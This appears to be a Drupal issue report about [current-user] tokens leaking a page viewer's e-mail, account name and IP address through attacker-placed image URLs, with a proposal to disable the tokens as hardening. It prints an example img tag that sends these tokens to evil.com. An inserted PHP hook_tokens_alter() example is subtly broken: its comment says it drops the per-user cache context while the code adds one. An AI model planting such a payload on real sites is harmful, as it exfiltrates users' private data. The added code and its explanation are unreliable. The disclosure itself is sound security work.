Problem/Motivation

[current-user] tokens provide confidential information about the current user (e-mail, etc.).
Each user only sees their own information when using the token, but if an attacker can write tokens in a place that triggers an HTTP request (an image URL for example), it could be used to exfiltrate this information.

For example if a module allows using tokens in image URLs, an attacker with the appropriate permission could generate this img tag:

<img src="http://evil.com/?user=[current-user:account-name]&amp;email=[current-user:mail]&amp;ip=[current-user:ip-address]">

And every time a user displays the page, their e-mail address is sent to the attacker.

Tokens currently don't have access checks (#3489852: Token replace system has no access checking), so they can be abused in various ways.
But even if this were fixed, each user would still have access to the [current-user] tokens and risk exfiltrating data when browsing a page. That's why I'm opening a separate issue.

Steps to reproduce

I don't think this can be exploited with core only.
See related issues for examples in contrib.

Proposed resolution

Maybe as a hardening we could disable these tokens by default so at least they can't be used on websites that don't need them.
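One way a site could apply that hardening today, as an added example that is not code from this issue or from Drupal core: a small custom module (name "nocurrentuser" is assumed) implementing hook_tokens_alter() so that every [current-user:*] token expands to an empty string instead of the viewer's data.

```php
<?php

/**
 * @file
 * Added example: blank out all [current-user:*] token replacements.
 *
 * Assumes a custom module named "nocurrentuser". Because the hook runs
 * after replacements are generated, it works regardless of which module
 * (core or contrib) asked for the token, including image URLs rendered
 * for an arbitrary page viewer.
 */

use Drupal\Core\Render\BubbleableMetadata;

/**
 * Implements hook_tokens_alter().
 */
function nocurrentuser_tokens_alter(array &$replacements, array $context, BubbleableMetadata $bubbleable_metadata) {
  // Only the "current-user" token type describes the person viewing
  // the page; other types (e.g. "user" for an explicit account) are left alone.
  if ($context['type'] !== 'current-user') {
    return;
  }

  // $context['tokens'] maps the token name (e.g. "mail") to the raw
  // token text that appeared in the content (e.g. "[current-user:mail]").
  foreach ($context['tokens'] as $name => $original) {
    // Empty replacement: the token disappears from the output, so an
    // injected <img src="http://evil.example/?e=[current-user:mail]">
    // requests a URL that carries no data about the viewer.
    $replacements[$original] = '';
  }

  // The result no longer varies per user, so drop the per-user cache
  // context that the original replacement may have added.
  $bubbleable_metadata->addCacheContexts(['user']);
}
```

The last call keeps the render array correct if other replacements on the same page remain user-specific; a site that never uses [current-user] tokens can omit it.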

Remaining tasks

User interface changes

Introduced terminology

API changes

Data model changes

Release notes snippet

Comments

prudloff created an issue.